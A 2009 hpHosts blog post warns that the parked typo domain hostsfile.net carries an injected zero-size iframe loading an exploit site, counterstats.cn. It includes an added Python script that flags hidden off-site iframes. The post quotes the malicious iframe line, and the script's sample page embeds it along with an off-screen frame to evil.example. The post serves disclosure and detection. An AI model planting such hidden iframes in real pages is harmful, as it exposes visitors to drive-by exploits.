Blog for hpHosts, and whatever else I feel like writing about ....

Saturday 7 November 2009

Warning: How a simple typo can hurt ....

99% of you will already be aware of the likes of typo squatters, so I'll refrain from blabbering on about those ones and instead use one I came across today, which isn't actually a typo squatter (it's "parked"), but still contains a nasty surprise.

The domain is hostsfile.net. Look familiar? Yep, hpHosts is hosts-file.net (notice the difference?). If you made that typo whilst looking for the hpHosts website, you'd unfortunately set yourself up for an exploit, as lurking in the source code of hostsfile.net is the following:

<iframe src="http://counterstats.cn/index.php" width="0" height="0" frameborder="0"></iframe>


Thankfully in this case, counterstats.cn seems to be down at present (OpenDNS, even after refreshing its cache, is returning a "Did not resolve" error, not quite the NXDOMAIN I'd normally see, but good enough to prevent its loading), but it was serving some exploits the last time it was up. If you find this one via Google, you'll also notice Google's results carry a warning not only for the infection site itself, but should also, as is the case with hostsfile.net, carry one for the site that's been compromised.
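The injection above is the classic pattern: an iframe collapsed to 0x0 (or hidden with CSS) that pulls in a page from a domain the site has no business loading. As an added example, not code from the hpHosts post or any tool it mentions, the following standard-library Python script pulls every iframe out of a page's source and flags the ones that are both hidden and off-site. The sample pages are constructed for the example; only the counterstats.cn iframe line is copied from the post, and the other hostnames in the samples are made up.

```python
"""Flag hidden, off-site iframes in page source (the hostsfile.net injection pattern).

Added example, not from the hpHosts post. Standard library only, so it runs offline
against the embedded sample markup below. The sample pages are constructed; only the
counterstats.cn iframe is taken from the post, the other hosts are placeholders.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline CSS tricks commonly used to hide a frame without width="0"/height="0".
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:width|height)\s*:\s*[01](?:px)?\b"
    r"|(?:left|top)\s*:\s*-\d{3,}px",
    re.I,
)


def _is_collapsed(value):
    """True for a width/height attribute of 0 or 1 (with or without units)."""
    if value is None:
        return False
    m = re.match(r"\s*(\d+)", value)
    return m is not None and int(m.group(1)) <= 1


class IframeCollector(HTMLParser):
    """Collects the attribute dict of every <iframe> start tag in the document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lowercases tag and attribute names.
        if tag == "iframe":
            self.iframes.append(dict(attrs))


def find_hidden_iframes(html, page_host):
    """Return findings for iframes that are hidden AND point at a host other than page_host.

    Same-site frames (page_host itself or a subdomain of it) are ignored; a hidden
    same-site frame is odd but not the cross-domain exploit loader we are hunting.
    """
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        host = urlparse(src).hostname or ""
        reasons = []
        if _is_collapsed(attrs.get("width")) or _is_collapsed(attrs.get("height")):
            reasons.append("zero-sized")
        if HIDDEN_STYLE.search(attrs.get("style") or ""):
            reasons.append("hidden-by-style")
        off_site = bool(host) and host != page_host and not host.endswith("." + page_host)
        if reasons and off_site:
            findings.append({"src": src, "host": host, "reasons": reasons})
    return findings


# Constructed sample: a parked page carrying the iframe quoted in the post, plus a
# visible same-site frame and a CSS-offscreen frame to a placeholder host.
PARKED_PAGE = """<html><body>
<h1>hostsfile.net</h1><p>This domain is parked.</p>
<iframe src="http://counterstats.cn/index.php" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://hostsfile.net/ads.html" width="300" height="250"></iframe>
<iframe src="http://evil.example/x.html" style="position:absolute;left:-9999px"></iframe>
</body></html>"""

# Constructed sample: an ordinary page with a visible third-party embed (not flagged).
CLEAN_PAGE = """<html><body>
<iframe src="https://video.example/embed/abc" width="560" height="315"></iframe>
</body></html>"""


if __name__ == "__main__":
    for host, page in (("hostsfile.net", PARKED_PAGE), ("example.com", CLEAN_PAGE)):
        hits = find_hidden_iframes(page, host)
        print(f"{host}: {len(hits)} suspicious iframe(s)")
        for hit in hits:
            print(f"  {hit['src']}  [{', '.join(hit['reasons'])}]")
```

Run against the parked page it reports the counterstats.cn frame (zero-sized) and the off-screen one, while the visible same-site ad frame and the clean page's video embed are left alone. To use it on a live page, feed it the raw HTML as fetched (before any script runs), since injected loaders are frequently added by JavaScript as well and that would need a rendered-DOM check this script does not do.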

hostsfile.net IS actually registered, and the last time I checked it was a legit site, but it is currently parked with eccparking.com, so it's looking like the compromise is at the eccparking.com end (I confirmed this by visiting the IP itself, 67.228.216.52, which is on the SoftLayer range). I'll be phoning them in a few mins to confirm and correct this.

Moral of the story? Be careful out there folks (yeah yeah, I can already hear the "but we are, really we are" ;o) ).

/update 03:57

Tried calling ECCParking, but got a "could not be routed" error. I have, however, followed up with an e-mail to SoftLayer.

1 comment:

Zaphod said...

Yow! This is a case of needing to yank a domain and appropriate it to the valid service, or at least cause a forwarding to it until such time as the hostname points at a valid service of its own.